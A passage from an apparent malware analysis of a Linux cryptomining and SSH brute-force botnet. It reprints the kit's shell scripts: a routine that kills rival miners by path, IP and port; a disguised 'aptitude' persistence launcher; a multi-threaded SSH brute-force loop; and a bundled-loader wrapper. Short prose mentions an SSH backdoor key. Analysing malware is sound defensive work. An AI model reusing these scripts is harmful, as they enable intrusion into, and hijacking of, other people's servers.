then
kill $sshdpid
fi
done < /tmp/ssdpid
rm -f /tmp/ssdpid
# syslog
ps ax | grep syslogs | grep -v grep | awk '{print $1}' > /tmp/syslogspid
while read syslogpid
do
if [ $(echo $(ps -p $syslogpid -o %cpu | grep -v \%CPU) | sed -e 's/\.[0-9]*//g') -ge 60 ]
then
kill $syslogpid
fi
done < /tmp/syslogspid
rm /tmp/syslogspid -f
ps x | grep 'b 22'| awk '{print $1,$5}' > .procs
cat .procs | while read line
do
pid=`echo $line | awk '{print $1;}'`
name=`echo $line | awk '{print $2;}'`
#echo $pid $name
if [ $(echo $name | wc -c) -lt "13" ]
then
echo "Found" $pid $name
kill -9 $pid
fi
done
####################################################
ps x | grep 'd 22'| awk '{print $1,$5}' > .procs
cat .procs | while read line
do
pid=`echo $line | awk '{print $1;}'`
name=`echo $line | awk '{print $2;}'`
#echo $pid $name
if [ $(echo $name | wc -c) -lt "13" ]
then
echo "Found" $pid $name
kill -9 $pid
fi
done
}
# Removing miners by known path IOC
files(){
rm /tmp/.cron
rm /tmp/Donald*
rm /tmp/Macron*
rm /tmp/.main
rm /tmp/.yam* -rf
rm -f /tmp/irq
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*httpd.conf
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*index_bak*
rm -rf /tmp/.systemd-private-*
rm -rf /tmp/.xm*
rm -rf /tmp/a7b104c270
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -rf /tmp/httpd.conf
rm -rf /tmp/java*
rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/xm*
rm -rf /var/tmp/java*
}
# Killing and blocking miners by network related IOC
network(){
# Kill by known ports/IPs
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 140.82.52.87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 119.9.76.107 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :23 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :143 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :2222 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :3389 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :6665 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :6667 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :8444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
}
files
processes
network
echo "DONE"
run then checks the architecture: on i686 it starts anacron, a 32-bit miner derived from XMRig 2.14; on x86_64 it starts ./kswapd0.
Next dota/.rsync/b/a runs and finally starts ps, the SSH backdoor already described, which lets the attacker log in over SSH with the planted key and no password.
Finally c/start runs. It writes a small aptitude wrapper that calls run and launches it; the brute-forcer then fetches target addresses, ports and credential dictionaries from the network:
#!/bin/sh
pwd > dir.dir
dir=$(cat dir.dir)
cd $dir
chmod 777 *
rm -rf n
echo "1">n
echo "#!/bin/sh
cd $dir
./run &>/dev/null" > aptitude
chmod u+x aptitude
chmod 777 *
./aptitude >> /dev/null &
exit 0
Following the chain further, go is the loop that starts tsm with the target list (ip) and password list (p), 535 threads at a time, for up to nine hours per round:
#!/bin/bash
dir=`pwd`
cd $dir
threads=535
ARCH=`uname -m`
if [[ "$ARCH" =~ ^arm ]]; then
threads=75
fi
while :
do
touch v
rm -rf p
rm -rf ip
rm -rf xtr*
rm -rf a a.*
rm -rf b b.*
sleep $[ ( $RANDOM % 30 ) + 1 ]s
timeout 9h ./tsm -t $threads -f 1 -s 12 -S 9 -p 0 -d 1 p ip
sleep 3
rm -rf xtr*
rm -rf ip
rm -rf p
rm -rf .out
rm -rf /tmp/t*
done
exit 0
The tsm wrapper script: it picks the 32- or 64-bit build and runs it through the bundled dynamic loader lib/*/tsm (--library-path is an ld.so option), so the brute-forcer runs against the libc shipped with it rather than the system's.
#!/bin/bash
SCRIPT_PATH=$(dirname $(readlink -f $0))
ARCH=`uname -m`
if [ "$ARCH" == "i686" ]; then
$SCRIPT_PATH/lib/32/tsm --library-path $SCRIPT_PATH/lib/32/ $SCRIPT_PATH/tsm32 $*
elif [ "$ARCH" == "x86_64" ]; then
$SCRIPT_PATH/lib/64/tsm --library-path $SCRIPT_PATH/lib/64/ $SCRIPT_PATH/tsm64 $*
fi